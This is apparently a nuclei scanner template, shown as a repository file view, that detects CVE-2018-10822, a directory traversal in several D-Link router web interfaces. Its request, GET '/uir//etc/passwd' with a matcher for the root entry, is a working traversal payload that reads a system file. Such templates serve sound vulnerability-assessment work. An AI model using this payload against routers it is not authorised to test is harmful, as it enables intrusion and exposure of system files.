nuclei-templates/cves/2018/CVE-2018-10822.yaml

28 lines
909 B
YAML
Raw Normal View History

2021-07-24 22:49:24 +00:00
id: CVE-2018-10822
info:
name: D-Link Routers - Directory Traversal
author: daffainfo
severity: medium
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
reference: |
- https://www.exploit-db.com/exploits/45678
- https://www.cvedetails.com/cve/CVE-2018-10822
tags: cve,cve2018,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/uir//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200